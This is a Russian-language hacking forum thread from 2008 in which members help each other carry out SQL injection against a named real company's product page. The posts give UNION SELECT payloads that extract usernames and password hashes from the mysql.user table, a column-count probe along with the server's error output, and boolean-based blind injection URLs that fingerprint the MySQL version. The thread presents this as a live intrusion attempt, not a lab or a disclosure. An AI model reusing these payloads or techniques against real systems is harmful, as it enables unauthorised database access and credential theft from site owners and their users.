15.02.2008, 14:45
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами:
9633635
Репутация:
338
|
|
Сообщение от aka PSIH
CaNNabi$
union select 1,2,3,4,user,6,7,8 from mysql.user/*
либо так
union select 1,2,3,4,concat_ws(0x3a,user,password),6,7,8 from mysql.user/*
Спасибо)
|
|
|
15.02.2008, 17:41
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
Это сработает, если есть доступ к бд mysql, если его нет - проходим лесом))
|
|
|
|
16.02.2008, 18:02
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Invalid Query: select * from item where item_id = -256 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34/* && inactive = 'N' Error is: You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,2' at line 2
Выдало ошибку, после того как я подобрал количество столбцов:
http://www.site.com/product.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34/*
Всё прально ведь,а выдал ошибку (
|
|
|
|
16.02.2008, 19:18
|
|
Участник форума
Регистрация: 02.06.2006
Сообщений: 241
С нами:
10495658
Репутация:
142
|
|
линку довай
|
|
|
|
16.02.2008, 19:28
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http://www.brunton.com/product.php?id=-256+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34/*
|
|
|
|
16.02.2008, 19:40
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
http://www.brunton.com/product.php?id=256%20and%20substring(version(),1,1 )=3
там мускул третий, в нем нет конструкции union select
__________________
Карфаген должен быть разрушен...
|
|
|
|
16.02.2008, 19:43
|
|
Участник форума
Регистрация: 02.06.2006
Сообщений: 241
С нами:
10495658
Репутация:
142
|
|
ых, кто бы мог подумать)
|
|
|
|
16.02.2008, 20:19
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Ж)))ы откуад ты это взял всякие енд:РРР. Лан пасибо всем :Р
|
|
|
|
16.02.2008, 20:24
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Чет я не фкурил, а где там версия отображается?))
|
|
|
|
16.02.2008, 20:35
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Велемир, ну ты жжешь, она и не должна отображаться просто если выражение substring(version(),1,1 )=3 правильное, то отображается страница http://www.brunton.com/product.php?id=256 , а если нет, то страница не отобразится, попробуй
http://www.brunton.com/product.php?id=256%20and%20substring(version(),1,1 )=4
http://www.brunton.com/product.php?id=256%20and%20substring(version(),1,1 )=5
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
